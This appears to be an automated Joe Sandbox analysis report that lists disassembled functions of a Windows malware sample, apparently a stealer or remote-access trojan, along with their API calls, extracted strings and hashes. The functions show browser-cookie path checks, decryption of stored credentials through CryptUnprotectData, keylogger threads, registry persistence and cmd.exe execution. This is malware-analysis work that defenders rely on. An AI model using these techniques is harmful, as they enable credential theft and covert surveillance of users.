                                              • Opcode Fuzzy Hash: 817b4c01eafabb62cefe08f25f435df96e29b2123a05dda1d2c5d8970e98f987
                                              • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                              Function 00449540 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 004495B3
                                              • _free.LIBCMT ref: 00449609
                                                • Part of subcall function 004493E5: _free.LIBCMT ref: 0044943D
                                                • Part of subcall function 004493E5: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                • Part of subcall function 004493E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                • Part of subcall function 004493E5: WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                              • String ID: v%(/
                                              • API String ID: 314583886-2435473048
                                              • Opcode ID: 7157d135af61fd44e2cb6d5b559f28f12d3d349b8bb5886b655d4841be14934b
                                              • Instruction ID: da5c51787f9f1a1f19b75189942e14dcbf4476fdba08df6e704f400b95fb1742
                                              • Opcode Fuzzy Hash: 7157d135af61fd44e2cb6d5b559f28f12d3d349b8bb5886b655d4841be14934b
                                              • Instruction Fuzzy Hash: 6D21517380011577FF31B7259C81DEB7368DB45724F21029BF898A3181EB784EC19A9D
                                              Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00416330
                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _wcslen$CloseCreateValue
                                              • String ID: !D@$okmode$PG
                                              • API String ID: 3411444782-3370592832
                                              • Opcode ID: 32b767abda9d74a658984582e830535edcfbd4fa180c3dcb91f0b96cbdeabe52
                                              • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                              • Opcode Fuzzy Hash: 32b767abda9d74a658984582e830535edcfbd4fa180c3dcb91f0b96cbdeabe52
                                              • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                              Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                              Strings
                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                              • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                              • API String ID: 1174141254-1980882731
                                              • Opcode ID: 2a38480921e4d6be1d5b2529be3b715cdf247bf3a0a1df31f1585b54042120b5
                                              • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                              • Opcode Fuzzy Hash: 2a38480921e4d6be1d5b2529be3b715cdf247bf3a0a1df31f1585b54042120b5
                                              • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                              Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                              Strings
                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                              • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                              • API String ID: 1174141254-1980882731
                                              • Opcode ID: 48aa145b66dc80a11566b4620fdd9ce13eae5fb2ee34664654c02424daf75182
                                              • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                              • Opcode Fuzzy Hash: 48aa145b66dc80a11566b4620fdd9ce13eae5fb2ee34664654c02424daf75182
                                              • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                              Function 0040B19F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                              • wsprintfW.USER32 ref: 0040B22E
                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EventLocalTimewsprintf
                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                              • API String ID: 1497725170-1359877963
                                              • Opcode ID: 58d3a23b94d8cd78535e1a51a4d83277ead2fee3ca3e9392ef7fdbbbb876cc50
                                              • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                              • Opcode Fuzzy Hash: 58d3a23b94d8cd78535e1a51a4d83277ead2fee3ca3e9392ef7fdbbbb876cc50
                                              • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                              Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                              • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread$LocalTime$wsprintf
                                              • String ID: Online Keylogger Started
                                              • API String ID: 112202259-1258561607
                                              • Opcode ID: 0fcd38e96aacb40c04b118771990cdae8bba74e61c9056a984dbcae37755a7c2
                                              • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                              • Opcode Fuzzy Hash: 0fcd38e96aacb40c04b118771990cdae8bba74e61c9056a984dbcae37755a7c2
                                              • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                              Function 0044BDEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,00000000,0040F3F6,?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE42
                                              • GetLastError.KERNEL32(?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE4C
                                              • __dosmaperr.LIBCMT ref: 0044BE77
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseErrorHandleLast__dosmaperr
                                              • String ID: pt\
                                              • API String ID: 2583163307-2185105519
                                              • Opcode ID: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                              • Instruction ID: c640735ad7e51643fe6b0a0a71fefea3e0d0f945221813f090adf85c72c27ea1
                                              • Opcode Fuzzy Hash: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                              • Instruction Fuzzy Hash: AC01483260066866E624623858457BF6789CBC2739F35022FFE18872C3DF6CCC8181D9
                                              Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                              • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: CryptUnprotectData$crypt32
                                              • API String ID: 2574300362-2380590389
                                              • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                              • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                              • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                              • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                              Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                              • CloseHandle.KERNEL32(?), ref: 004051CA
                                              • SetEvent.KERNEL32(?), ref: 004051D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandleObjectSingleWait
                                              • String ID: Connection Timeout
                                              • API String ID: 2055531096-499159329
                                              • Opcode ID: cfa6aba80e3ab73a333b17ef678a4c224e2718187884c1035a1560e2fee3ab95
                                              • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                              • Opcode Fuzzy Hash: cfa6aba80e3ab73a333b17ef678a4c224e2718187884c1035a1560e2fee3ab95
                                              • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                              Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                              Download Yara Rule
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Exception@8Throw
                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                              • API String ID: 2005118841-1866435925
                                              • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                              • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                              • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                              • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                              Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                                              • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,8)[), ref: 00413888
                                              • RegCloseKey.ADVAPI32(?,?,0040F85E,pth_unenc,8)[), ref: 00413893
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: pth_unenc
                                              • API String ID: 1818849710-4028850238
                                              • Opcode ID: d69e82d7a202b39eabff8c6d6945ecb801863ff8e3666436e459375cd1f846cd
                                              • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                              • Opcode Fuzzy Hash: d69e82d7a202b39eabff8c6d6945ecb801863ff8e3666436e459375cd1f846cd
                                              • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                              Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                              • String ID: bad locale name
                                              • API String ID: 3628047217-1405518554
                                              • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                              • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                              • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                              • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                              Function 00448B66 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocaleValid
                                              • String ID: IsValidLocaleName$kKD$v%(/
                                              • API String ID: 1901932003-796097221
                                              • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                              • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                              • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                              • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                              Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                              • ShowWindow.USER32(00000009), ref: 00416C9C
                                              • SetForegroundWindow.USER32 ref: 00416CA8
                                                • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(0C[), ref: 0041CE35
                                                • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                              • String ID: !D@
                                              • API String ID: 186401046-604454484
                                              • Opcode ID: dddbeebbe8cb821cdc8b1c7d2847af7eb141aaddcd72dd608c7fa4ca11ce81ef
                                              • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                              • Opcode Fuzzy Hash: dddbeebbe8cb821cdc8b1c7d2847af7eb141aaddcd72dd608c7fa4ca11ce81ef
                                              • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                              Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteShell
